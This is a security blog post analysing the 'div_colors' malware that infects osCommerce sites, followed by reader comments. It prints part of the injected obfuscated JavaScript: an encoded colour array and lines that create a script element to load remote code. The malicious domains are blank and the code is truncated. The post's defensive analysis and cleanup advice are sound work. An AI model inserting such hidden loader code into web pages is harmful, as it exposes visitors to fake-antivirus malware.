The “div_colors” Malware Update

We are still seeing a big growth in the number of sites infected with the div_colors malware string. In fact, the osCommerce forums are full of people asking about it, uncertain what to do, and what it does.

So, what is this div_colors stuff? It is malware that targets osCommerce installations and added the following obfuscated code to the pages:

if (typeof(redef_colors)==”undefined”) {
var div_colors = new Array("#4b8272′, "#81787f’, ‘#832f83′, ‘#887f74′, ‘#4c3183′, ‘#748783′, ‘#3e7970′, ‘#857082′, ‘#728178′, ‘#7f8331′, ‘#2f8281′, ‘#724c31′, ‘#778383′, ‘#7f493e’, ‘#3e7a84′, ‘#82837e’, ‘#40403d’, ‘#727e7c’, ‘#3e7982′, ‘#3e7980′, ‘#847481′, ‘#883d7c’, ‘#787d3d’, ‘#7f777f’, "#314d00′);..

var redef_colors = 1;
var colors_picked = 0;

function div_pick_colors(t,styled) {

As you can see, it looks like a valid JavaScript and that’s what is confusing a lot of people. In fact, what it does is load a new (and malicious) JavaScript element from an external web site, as you can see here:

var new_cstyle=document.createElement("script”);
document.getElementsByTagName("head”)[0]. appendChild(new_cstyle);

Where is it lloading the malicious code from?

Right now, it is loading from, but a few hours ago, it was using a different domain name, and it changes every few hours! The code is also mutating, and every infected site has a backdoor to load the new variation every once in a while.

This is a list of the some of the domains used so far:

As you can see by the common domain names, it is trying to push the infamous fake AV.

Here is the frame created by the first intermediary, which is also changing:

<frame src ="" ..
<frame src="

It’s a very complex malware, and every osCommerce user needs to make sure their site is secure. The file_manager.php file needs to be removed, and the admin directory renamed and protected. We also recommend our security scanner to verify if a site is infected. If it is, we can take care of it for you.

About David Dede

David Dede is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

  • jeremy

    I got infected… I was able to fix the pages with SED. Does anyone know where these ‘backdoors’ are?? I want to make sure this doesn’t happen again.

    • Jonathan

      Hi Jeremy. My site hot infected also… Have you found what caused it?

  • David Psd Xhtml

    Thousand sites with this malware… webmasters headache

  • Ehaba

    I write small program that delete mallware code from all js scripts. The PHP script also delete one more type mallware and set mask read only for each file on server with need extension.
    Link for download

Share This